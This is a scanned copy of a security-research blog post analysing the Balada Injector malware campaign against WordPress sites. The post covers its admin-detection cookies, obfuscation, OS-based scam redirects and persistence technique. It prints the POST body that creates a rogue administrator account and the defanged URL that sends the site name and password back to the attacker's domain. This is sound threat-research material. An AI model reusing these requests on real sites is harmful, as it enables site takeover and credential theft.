www.geoedge.com
Open in
urlscan Pro
141.193.213.20
Public Scan
URL:
https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/
Submission: On December 06 via api from IN — Scanned from DE
Submission: On December 06 via api from IN — Scanned from DE
Form analysis 1 forms found in the DOM
POST /balda-injectors-2-0-evading-detection-gaining-persistence/#gf_1
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_1" id="gform_1" action="/balda-injectors-2-0-evading-detection-gaining-persistence/#gf_1" data-formid="1" novalidate="">
<div class="gform-body gform_body">
<div id="gform_fields_1" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_1_1" class="gfield gfield--type-email field_sublabel_below gfield--no-description field_description_below hidden_label gfield_visibility_visible" data-js-reload="field_1_1"><label class="gfield_label gform-field-label"
for="input_1_1">Email</label>
<div class="ginput_container ginput_container_email"> <input name="input_1" id="input_1_1" type="email" value="" class="large" placeholder="Business email*" aria-invalid="false"> </div>
</div>
<div id="field_1_3" class="gfield gfield--type-captcha gfield--width-full field_sublabel_below gfield--no-description field_description_below gfield_visibility_visible" data-js-reload="field_1_3"><label class="gfield_label gform-field-label"
for="input_1_3">CAPTCHA</label>
<div id="input_1_3" class="ginput_container ginput_recaptcha" data-sitekey="6LebtdsUAAAAALfAW12o-fXEhp7X-DhnZrY7YKK1" data-theme="light" data-tabindex="0" data-badge=""></div>
</div>
</div>
</div>
<div class="gform_footer top_label"> <input type="submit" id="gform_submit_button_1" class="gform_button button" value="Submit"
onclick="if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} "
onkeypress="if( event.keyCode == 13 ){ if(window["gf_submitting_1"]){return false;} if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;} jQuery("#gform_1").trigger("submit",[true]); }">
<input type="hidden" name="gform_ajax" value="form_id=1&title=&description=&tabindex=0&theme=data-form-theme='gravity-theme'"> <input type="hidden" class="gform_hidden" name="is_submit_1" value="1"> <input type="hidden"
class="gform_hidden" name="gform_submit" value="1"> <input type="hidden" class="gform_hidden" name="gform_unique_id" value=""> <input type="hidden" class="gform_hidden" name="state_1"
value="WyJbXSIsIjc4MmI2OGFhOWFjNzFlODdhNzZjM2ZlMWFmMjBhOWQ4Il0="> <input type="hidden" class="gform_hidden" name="gform_target_page_number_1" id="gform_target_page_number_1" value="0"> <input type="hidden" class="gform_hidden"
name="gform_source_page_number_1" id="gform_source_page_number_1" value="1"> <input type="hidden" name="gform_field_values" value=""> </div>
</form>Text Content
Skip to content
* We’re Hiring!
* Sales Questions?
* Need Support?
* Login
Menu
* We’re Hiring!
* Sales Questions?
* Need Support?
* Login
Free Trial
* Publishers
* Real-Time Protection
* Creative QA Automation
* Platforms
* Ongoing Protection
* Pre-Approval Verification
* CTV
* App Developers
* Technology
* Malvertising Protection
* Ad Quality Control
* Pricing
* Resources
* Malvertising
* Blog
* Reports, Whitepapers & eBooks
* Case Studies & Customers
* Podcast
* Ad Ops University
* Video Library
* Company
* About Us
* Careers
* Proxy
* Contact Us
* Start Free Trial
Menu
* Publishers
* Real-Time Protection
* Creative QA Automation
* Platforms
* Ongoing Protection
* Pre-Approval Verification
* CTV
* App Developers
* Technology
* Malvertising Protection
* Ad Quality Control
* Pricing
* Resources
* Malvertising
* Blog
* Reports, Whitepapers & eBooks
* Case Studies & Customers
* Podcast
* Ad Ops University
* Video Library
* Company
* About Us
* Careers
* Proxy
* Contact Us
* Start Free Trial
BALADA INJECTOR 2.0: EVADING DETECTION & GAINING PERSISTENCE
Home / Security Research / Balada Injector 2.0: Evading Detection & Gaining
Persistence
By
GEOEDGE TEAM
in
SECURITY RESEARCH
GeoEdge’s Security team has uncovered a novel technique utilized by the Balada
Injector. Balada Injector is known for its ability to exercise control over
vulnerable websites, implanting malicious scripts that auto-redirect
unsuspecting users to scam or adult pages. To evade detection, the attacker has
implemented a filtering mechanism, which prevents automatic redirection when the
website is accessed by an administrator.
Differing from the previous iteration of the attack, GeoEdge’s Security team has
identified a novel technique employed by Balada Injector. Moriya Pedael,
security researcher at GeoEdge revealed, that this technique achieves a full
takeover of the website functionality and keeps persistence on vulnerable
websites by creating a new admin user.
TARGETING USERS
In the past, the attacker directed the auto-redirect at innocent clients by
ensuring the absence of two cookies, ‘wp-settings’ and ‘wp-settings-time.’
These cookies are built into WordPress, serving to customize the admin
interface. If these cookies are present on the client’s page, it indicates that
the client is an admin.
Presently, the attacker identifies admin clients by an additional cookie, in
addition to the previously mentioned ones, or by monitoring the browser’s
location.
Conditions Balada-Injector uses to detect an admin session:
1. ‘wp-settings’ cookie is in the document. (legacy filter)
2. ‘wp-settings-time’ cookie is in the document (legacy filter)
3. ‘logged_in’ cookie is in the document.
4. ‘wp-admin’ in window.location.href
5. ‘wp-login.php’ in window.location.href
Additionally, Balada Injector now redirects users based on their OS type,
ensuring the scam page is more relevant to the target. Below are figures to
demonstrate it.
Figure 1: Redirect attack on IOS devices
Figure 2: Redirect attack on other devices.
PERSISTENCE CONTROL ON VULNERABLE WEBSITES
In the past, the attacker’s ability to maintain control over a website depended
on exploiting existing vulnerabilities within the site. The greater the
vulnerability, the more control they could obtain. Sometimes, the attacker used
a combination of a few vulnerabilities, making control possible.
This process remained hidden from anyone except the attacker or the target
website’s administrator, who could detect it by examining website logs or
scanning files for infections.
Now, Balada Injector has adopted a new technique to gain persistence control.
The injected script within the compromised website, deployed on the client side,
exclusively targets administrators of the infected websites.
When an admin is connected, the script leverages the admin’s permissions to
create a new admin account, ensuring ongoing access and the ability to reinfect
the website even after it has been patched. To exclusively target
administrators, the attacker employs the five detection mechanisms described
earlier.
STATIC ANALYSIS
Similar to the common Balada Injector pattern attack, the malicious script is
obfuscated and utilizes functions like ‘eval’ and ‘String.fromCharCode’ to
obfuscate the script, making it complex and challenging for humans or computers
to decipher. These techniques are employed to evade lexical-based detection
methods.
As you can see in the screenshot below, static detection methods can’t decide if
the created script (by ‘eval’ function) is malicious, until connecting all the
ascii numbers into a normal script or after it’s already known as malicious.
Figure 3: Screenshot of the script embedding in the infected page.
Figure 4: Decoded script
The embedded script created a new script that was taken from the malicious
domain itself. the structure of this script path is:
hxxp://{malicious_domain}/src/page.js
This script is also obfuscated and has the encoding technic described above.
Figure 5: Part of the script ‘page.js’ from the malicious domain.
The flow of the ‘page.js’ script:
The filtering mechanism is executed first, and if the connected client is
identified as an admin (possessing the ‘wpsapiadmin’ cookie), the ‘create-user’
dynamic script is initiated.
Figure 6: Screenshot of initiating the ‘create-user’ attack on admins.
Figure 7: Dynamic ‘create-user’ script.
The Malicious ‘Create-User’ Script:
Once the attacker identifies the client as an admin, they ensure that the
targeted website has not already been compromised by checking the website’s
users. A request is made to ‘/wp-admin/users.php’ to check if a foreign admin
user (the user to be created during the successful phase) exists. The malicious
admin created in this attack is ‘greeceman.’
If it does not exist, the attacker makes another request, this time to
‘/wp-admin/user-new.php’ to get a ‘wp-nonce’ to create a new user.
A WordPress nonce serves as a unique security code that safeguards URLs and
forms against harmful attacks. It assists WordPress in verifying the legitimacy
of a request, thus preventing unauthorized actions and inputs.
After obtaining the nonce, the attacker sends another request to
‘/wp-admin/user-new.php,’ this time as a POST request with the following header
‘application/x-www-form-urlencoded’ and body values:
action=createuser
_wpnonce_create-user={the_created_nonce}
user_login=greeceman
email=greeceman@mail.com
pass1={random_created_password}@
pass2={random_created_password}@
role=administrator
The final request is a GET request with the fallen domain
(window.location.hostname) and the created password as query params. Sending
this information back to the attacker domain.
A query parameter is a piece of information appended to the end of a URL,
typically following a question mark.
The final request is:
hxxps://{maliciousDomain}/set.php?z={locationHostname}-p-{userPassword}@
At the time of writing, the domain found delivering this script is
decentralappps[.]com
ATTRIBUTION OF THE PERSISTENCE CODE TO BALADA INJECTOR
There are a few characteristics we found in our analysis that outrightly
attribute this campaign to Balada Injector:
1. The domain found delivering the malicious code is also delivering the final
stage of Balada Injector common redirect attack.
The figures 1,2 are examples of redirect pages this domain is leading.
2. Obfuscated script with ‘eval’ +’ String.fromCharCode’ functions
3. Same Admin filtering\ targeting mechanism.
GeoEdge is in contact with compromised sites, and our research into this attack
is ongoing. Stay informed about the latest trends and emerging threats by
keeping up to date. Reach out to the GeoEdge team for immediate support!
31
POSTS
GEOEDGE TEAM
GeoEdge is the trusted cyber security and ad quality partner for publishers and
platforms in the digital advertising industry. With more than a decade of
experience, we’ve built solutions to prevent tomorrow’s threats, today.
RELATED POSTS
MANAGING AD EXPERIENCES DURING THE 2024 ELECTION SEASON
>
PREVENTING DISRUPTIVE CTV AD EXPERIENCES
>
TUNE IN TO CTV VIEWERS ADVERTISING EXPECTATIONS
>
NOT ALL MALVERTISING SOLUTIONS ARE CREATED EQUAL
MALVERTISING, THE PRACTICE OF SPRINKLING MALICIOUS CODE INTO LEGITIMATE-LOOKING
ADS IS GROWING MORE SOPHISTICATED. GEOEDGE’S HOLISTIC AD QUALITY SOLUTION HAS
YOU COVERED.
Start Your Free Trial
TRUSTED BY:
450+ PUBLISHERS & PLATFORMS
SOLUTIONS
* Publishers
* Platforms
* App Developers
* Pricing
* Publishers
* Platforms
* App Developers
* Pricing
RESOURCES
* Blog
* Reports, Whitepapers & eBooks
* Ad Ops University
* Case Studies & Customers
* Blog
* Reports, Whitepapers & eBooks
* Ad Ops University
* Case Studies & Customers
INFORMATION
* About Us
* News & Events
* Careers
* Refer-a-Friend Program
* User First Approach to Monetization
* Sitemap
* Glossary
* About Us
* News & Events
* Careers
* Refer-a-Friend Program
* User First Approach to Monetization
* Sitemap
* Glossary
SUBSCRIBE TO ACTIVE SECURITY THREAT ALERTS
Email
CAPTCHA
Facebook-f Linkedin-in Twitter
© Copyright 2022 GeoEdge Ltd.
All rights reserved | Privacy Policy | Terms of Service
GeoEdge.com is owned and operated by Five Media Marketing Limited, 7 Florinis
Street, Nicosia, Cyprus.